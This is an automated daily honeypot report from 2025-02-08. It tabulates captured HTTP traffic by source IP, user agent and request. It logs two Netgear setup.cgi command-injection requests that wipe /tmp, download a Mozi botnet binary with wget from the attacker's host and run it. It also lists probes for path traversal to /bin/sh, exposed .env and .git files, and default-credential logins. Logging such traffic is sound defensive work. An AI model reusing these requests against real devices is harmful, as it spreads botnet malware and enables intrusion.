Table of Contents

Daily Report: 2025-02-08
#

interaction report on http service of various Hhoneypot around the world.

Botnet dropper behaviour
List of source IP addresses
List of user_agent
List of request
List of country_iso_code

botnet_dropper_behaviour
#

	remote_addr	request
0	115.51.102.117	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.51.102.117:57880/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1	59.184.247.7	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.184.247.7:34730/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

list_of_source_IP_addresses
#

	number_of_occurence	remote_addr
0	105	193.41.206.176
1	72	45.148.10.242
2	51	193.68.89.10
3	36	185.196.220.253
4	32	179.43.160.138
5	26	80.82.77.202
6	24	162.243.40.132
7	22	46.19.138.234
8	19	194.50.16.252
9	18	179.43.191.146
10	18	45.144.212.139
11	16	93.174.93.12
12	14	95.214.55.132
13	13	195.140.213.30
14	12	164.52.24.188
15	12	206.189.6.85
16	12	138.197.156.54
17	12	46.101.84.171
18	11	18.117.117.74
19	10	78.153.140.149
20	8	46.19.143.10
21	6	216.218.206.69
22	6	146.19.24.76
23	6	64.23.201.216
24	6	37.10.114.9
25	6	95.214.55.43
26	5	109.205.213.198
27	5	162.243.172.59
28	5	104.234.115.138
29	5	3.145.202.23
30	4	185.242.226.10
31	4	45.55.151.3
32	4	176.65.137.206
33	4	168.76.20.229
34	4	89.23.113.167
35	3	172.121.220.14
36	3	195.123.225.123
37	3	98.80.214.167
38	3	89.248.171.23
39	3	160.120.197.15
40	3	206.168.34.125
41	3	66.240.205.34
42	3	147.185.132.21
43	3	184.105.139.67
44	3	51.254.59.113
45	3	104.234.115.53
46	3	8.219.153.58
47	3	104.234.115.46
48	3	185.99.215.115
49	2	185.12.59.118
50	2	168.253.90.155
51	2	198.235.24.103
52	2	91.238.181.33
53	2	45.79.181.223
54	2	34.38.226.167
55	2	91.239.208.207
56	2	59.94.112.41
57	2	185.242.226.153
58	2	199.45.155.72
59	2	24.159.119.172
60	2	205.210.31.106
61	2	89.46.239.15
62	2	174.138.62.1
63	2	192.71.27.110
64	2	40.118.214.175
65	2	89.46.239.220
66	2	89.46.239.69
67	2	104.194.198.35
68	2	104.155.20.93
69	2	167.94.146.48
70	2	103.181.177.91
71	2	111.7.96.167
72	2	167.94.146.52
73	2	213.32.32.83
74	2	198.235.24.88
75	2	157.230.31.129
76	2	206.168.34.66
77	2	87.101.18.123
78	2	45.156.128.45
79	2	45.134.79.115
80	2	172.105.128.12
81	2	205.210.31.204
82	2	74.82.47.2
83	2	167.94.138.200
84	2	4.156.21.180
85	2	94.156.105.22
86	2	172.202.178.26
87	2	3.15.179.240
88	2	185.242.226.115
89	2	195.211.191.166
90	2	13.91.225.210
91	2	167.94.138.181
92	2	86.153.71.38
93	1	111.21.192.221
94	1	87.236.176.160
95	1	213.32.32.90
96	1	137.74.239.154
97	1	137.74.239.156
98	1	115.51.102.117
99	1	64.62.197.132
100	1	45.148.10.249
101	1	192.241.155.120
102	1	45.156.128.43
103	1	198.235.24.32
104	1	162.216.149.144
105	1	47.81.65.249
106	1	45.156.129.135
107	1	205.210.31.40
108	1	4.156.240.139
109	1	15.204.37.92
110	1	15.204.37.82
111	1	147.185.132.231
112	1	64.62.197.46
113	1	64.62.197.44
114	1	52.189.75.157
115	1	59.184.247.7
116	1	51.8.231.182
117	1	35.203.210.224
118	1	64.62.197.32
119	1	4.151.38.208
120	1	35.196.26.185
121	1	35.195.29.134
122	1	172.169.2.193
123	1	194.233.73.109
124	1	103.221.221.41
125	1	147.185.133.106
126	1	45.33.109.18
127	1	172.105.128.11
128	1	35.203.210.96
129	1	117.235.47.29
130	1	64.62.156.87
131	1	188.246.177.214
132	1	35.203.211.114
133	1	68.183.239.128
134	1	57.129.64.10
135	1	170.64.186.221
136	1	139.162.71.210
137	1	213.32.32.88
138	1	45.156.128.47
139	1	151.0.248.51
140	1	91.109.132.23
141	1	80.82.70.133
142	1	103.124.80.138
143	1	147.185.133.69
144	1	80.66.76.134
145	1	172.168.40.83
146	1	98.97.79.97
147	1	74.82.47.5
148	1	94.72.116.106
149	1	135.148.8.110
150	1	51.81.111.6
151	1	104.209.33.53
152	1	31.13.224.186
153	1	94.102.49.206
154	1	45.164.35.10
155	1	147.185.133.199
156	1	38.128.156.83
157	1	172.121.222.159
158	1	104.232.39.229
159	1	147.185.132.89
160	1	13.64.192.68
161	1	45.164.177.143
162	1	113.228.117.239
163	1	180.92.238.150
164	1	52.189.76.3
165	1	172.169.4.170
166	1	68.69.184.154
167	1	172.206.140.63
168	1	46.227.241.134
169	1	162.216.149.249
170	1	77.237.184.16
171	1	54.38.100.155
172	1	54.38.100.159
173	1	61.3.128.247
174	1	64.62.156.77
175	1	64.62.156.69
176	1	64.62.156.78
177	1	35.203.211.171
178	1	198.235.24.228
179	1	60.135.148.175
180	1	162.216.149.125
181	1	104.200.76.70
182	1	172.121.217.130
183	1	172.121.219.25
184	1	18.141.204.95
185	1	216.24.87.112
186	1	34.76.56.248
187	1	75.112.111.93
188	1	162.216.149.13
189	1	205.210.31.45
190	1	91.238.181.34
191	1	104.152.52.163
192	1	35.203.210.24
193	1	146.196.123.60
194	1	147.185.133.68
195	1	178.255.171.50
196	1	198.235.24.111
197	1	135.148.8.98
198	1	185.226.197.35
199	1	147.135.23.109
200	1	15.235.189.148
201	1	175.156.199.88
202	1	15.235.189.145
203	1	220.89.239.5
204	1	45.90.162.253
205	1	175.44.4.77
206	1	35.195.157.58
207	1	182.138.158.109
208	1	182.138.158.111
209	1	60.16.221.59
210	1	51.158.205.47
211	1	125.227.160.116
212	1	35.240.60.92
213	1	84.0.81.77
214	1	59.99.217.0
215	1	2.193.4.178
216	1	111.217.222.62
217	1	65.49.20.69
218	1	185.16.137.106
219	1	104.40.57.205
220	1	87.120.113.33
221	1	31.13.224.222
222	1	172.206.148.71
223	1	104.40.51.201
224	1	40.85.159.29
225	1	78.128.112.220
226	1	128.199.8.140

user_agent
#

	number_of_occurence	user_agent
0	326	-
1	148	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
2	36	Hello World
3	30	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
4	21	Mozilla/5.0 zgrab/0.x
5	20	Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
6	13	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
7	12	curl/7.88.1
8	12	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
9	10	Mozilla/5.0
10	10	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36
11	9	python-requests/2.32.3
12	8	xfa1
13	8	Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
14	8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
15	8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
16	7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
17	6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
18	6	Mozilla/5.0 (Linux; U; Android 8.1.0; en-US; Infinix X624B Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36
19	6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
20	6	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
21	5	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
22	5	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0)
23	5	curl/8.1.2
24	4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
25	4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.70
26	4	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
27	4	python-requests/2.26.0
28	4	‘Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; https://www.nokia.com/genomecrawler)'
29	4	Mozilla/5.0 (X11; Linux x86_64)
30	4	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
31	3	Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2166.2 Safari/537.36
32	3	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
33	3	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
34	3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
35	3	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.2210.133
36	3	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
37	3	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
38	3	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
39	2	masscan/1.3 (https://github.com/robertdavidgraham/masscan)
40	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
41	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
42	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
43	2	Mozilla/5.0 (iPhone; CPU iPhone OS 18_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Mobile/15E148 Safari/604.1
44	2	python-requests/2.31.0
45	2	Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
46	2	Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
47	2	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
48	2	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
49	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
50	2	Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
51	2	Mozilla
52	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36
53	1	Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
54	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.19
55	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.17 (KHTML, like Gecko) Version/17.3.75 Safari/616.17
56	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
57	1	Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
58	1	Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
59	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/617.2.4.11.12
60	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_6; de) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.2 Safari/605.1.15
61	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36
62	1	Links (2.1pre15; Linux 2.4.26 i686; 158x61)
63	1	Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10
64	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
65	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
66	1	Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
67	1	Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
68	1	Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)
69	1	Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
70	1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36
71	1	Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
72	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
73	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
74	1	Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
75	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6
76	1	Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
77	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36
78	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
79	1	Mozilla/5.0 (Linux; Android 9; MI 8 Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044851 Mobile Safari/537.36 MMWEBID/2901 MicroMessenger/7.0.6.1460(0x2700066A) Process/tools NetType/4G Language/zh_CN
80	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
81	1	Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
82	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
83	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15
84	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
85	1	Hello, World
86	1	msnbot/1.0 ( http://search.msn.com/msnbot.htm)
87	1	Mozilla/5.0 (Linux; Android 9; SM-G955F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
88	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36
89	1	Mozilla/5.0 (Linux; Android 9; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
90	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
91	1	Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0
92	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36
93	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0
94	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
95	1	Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
96	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
97	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
98	1	Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6
99	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36
100	1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
101	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
102	1	Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
103	1	Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
104	1	python-requests/2.28.1
105	1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
106	1	Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3
107	1	Mozilla/5.0 (Linux; Android 6.0.1; ONE E1003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36
108	1	Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975U1 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36
109	1	Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
110	1	Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
111	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
112	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
113	1	Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0
114	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
115	1	Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
116	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
117	1	Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
118	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36
119	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
120	1	Mediapartners-Google
121	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/5.0.4.3000 Chrome/47.0.2526.73 Safari/537.36
122	1	Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016
123	1	Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
124	1	Mozilla/5.0 (Linux; Android 4.2.2; WX10K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36
125	1	Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36

request
#

	number_of_occurence	request
0	336	GET / HTTP/1.1
1	72	GET /cgi-bin/luci/;stok=/locale HTTP/1.1
2	42	GET / HTTP/1.0
3	29	GET /.env HTTP/1.1
4	25	GET /favicon.ico HTTP/1.1
5	23	\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
6	9	POST / HTTP/1.1
7	7	SSH-2.0-Go
8	6	GET /manager/text/list HTTP/1.1
9	6	GET /.git/refs/ HTTP/1.1
10	6	GET /.git/refs/heads/ HTTP/1.1
11	6	GET /admin/assets/js/views/login.js HTTP/1.0
12	6	MGLNDD_xxx.xxx.xxx.xxx_80
13	6	HEAD / HTTP/1.1
14	6	GET /druid/index.html HTTP/1.1
15	5	GET /geoip/ HTTP/1.1
16	5	GET /t4 HTTP/1.1
17	5	GET /1.php HTTP/1.1
18	5	GET /form.html HTTP/1.1
19	5	GET /password.php HTTP/1.1
20	5	GET /systembc/password.php HTTP/1.1
21	5	GET /upl.php HTTP/1.1
22	5	GET /geoserver/web/ HTTP/1.1
23	5	POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
24	4	GET /redirectLoginGet.json?timeStamp=1715076379286 HTTP/1.1
25	4	\x16\x03\x01\x01
26	4	\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
27	3	\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
28	3	GET /.git/config HTTP/1.1
29	3	GET /.git/refs/tags/ HTTP/1.1
30	3	POST /app/modules/ut-cac/admin/cli.php HTTP/1.1
31	3	GET /.git/HEAD HTTP/1.1
32	2	GET /libs/js/iframe.js HTTP/1.0
33	2	GET /robots.txt HTTP/1.1
34	2	GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
35	2	H\x00\x00\x00tj\xA8\x9E#D\x98+\xCA\xF0\xA7\xBBl\xC5\x19\xD7\x8D\xB6\x18\xEDJ\x1En\xC1\xF9xu[l\xF0E\x1D-j\xEC\xD4xL\xC9r\xC9\x15\x10u\xE0%\x86Rtg\x05fv\x86]%\xCC\x80\x0C\xE8\xCF\xAE\x00\xB5\xC0f\xC8\x8DD\xC5\x09\xF4
36	2	GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
37	2	GET /users/users/users/login HTTP/1.1
38	2	GET /users/users/login HTTP/1.1
39	2	\x00\x00\x00\x00\x00\x06\x01\x03\xB4\x14\x00\x08
40	2	GET /Media/Images/1801359D.PNG HTTP/1.1
41	1	GET /stat HTTP/1.1
42	1	GET /status HTTP/1.1
43	1	GET /dev/_profiler/empty/search/results?limit=10 HTTP/1.1
44	1	GET /_profiler/empty/search/results?limit=10 HTTP/1.1
45	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03Z\xC4\x9E\x01\xD7l\x1D8\x86\xB2D\x7F\x89\xA4b\x88W\xDB\x98\xC2<\xEC\x15\xD7)8\xF6\x82\x09\xF9\xC5\xCD \x91\xFC\x13\xD6VB2\xB0o\xDB\x16H\xD4Wy\x06\x13\xF5\x9B\x0B\xE1\xDF\xEEV\x02W\x7F\x0F84\xC3\xA0\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
46	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03(!\xA8\xB9\xC4K\x86\xB1\xDB\x5C6\x98\x16\xA6\xC4\xF7\xDA\xB1\xB0\xC4\x91Q\x01i\xA3\xA1O(\x89u\x12\x89\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
47	1	GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1
48	1	GET /web/_profiler/empty/search/results?limit=10 HTTP/1.1
49	1	GET /public/_profiler/empty/search/results?limit=10 HTTP/1.1
50	1	GET /frontend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1
51	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03#\xF02d\x84\x8C\xB0]s\x1B\xBB\x98us\xA2\xF6\xF7\xCB\x9D{\xFC<l\xF6l;\xE6\xDBi\x1E\xA5g \xCE8\x1C\xAB~\x7F8\xDCF\xC7\xAA9-t\xC6\xCE\xAB\xF2\xC5\x13\xD4\xD3\xC3k\xAF
52	1	\x16\x03\x01\x00\xB1\x01\x00\x00\xAD\x03\x03\xE3\x0Bp\x1A+:\x85\x97u\x80\x07\x80\x83\xE7[\x119\xE7\xA6_t\x17\xBC\x82#&9\x8A\x18\x066\xC5\x00\x00P\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
53	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xB1B\xD0\xDE\x8Et\x16-F\x1B\x86p\xE61X\x89\x8Eq<\xCF\x12\xDA \xDD\xA2\x22~W4\x98\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
54	1	145.ll
55	1	PRI * HTTP/2.0
56	1	GET /profiler/empty/search/results?limit=10 HTTP/1.1
57	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03]\x83i\x13\x82\xE2\x1Bj9pKL\x81\x15Wx\x04ml\xA5\xDC\x1E\x8F\x1F6\xA9\xA0\xFD\xE8;)\xF8\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
